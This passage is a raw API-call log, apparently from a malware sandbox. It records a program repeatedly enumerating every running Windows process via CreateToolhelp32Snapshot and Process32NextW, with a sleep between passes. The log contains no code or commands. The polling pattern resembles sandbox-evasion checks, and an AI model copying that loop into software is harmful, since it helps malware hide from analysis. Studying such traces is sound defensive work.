dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.287] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.288] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.289] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.369] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.371] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.377] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.379] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.380] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.381] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.383] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.384] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.386] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.387] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.388] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.389] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.391] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.392] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.393] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.394] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.396] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0107.397] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0107.398] CloseHandle (hObject=0xbc) returned 1 [0107.398] Sleep (dwMilliseconds=0x12c) [0107.719] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0107.724] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.725] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.725] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.726] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.727] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.728] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.729] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.729] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0107.730] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0107.731] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.731] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.732] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.733] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.734] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0107.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.735] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.736] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0107.737] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.738] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.739] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0107.741] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0107.742] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0107.744] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.745] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0107.746] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0107.747] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0107.748] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0107.749] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0107.750] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0107.752] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0107.753] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0107.755] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0107.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0107.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0107.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0107.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0107.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0107.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0107.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0107.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0107.813] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0107.814] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0107.815] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0107.817] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0107.818] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0107.819] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0107.820] CloseHandle (hObject=0xc4) returned 1 [0107.820] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0107.825] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0107.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0107.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0107.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.828] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0107.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0107.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0107.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0107.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, 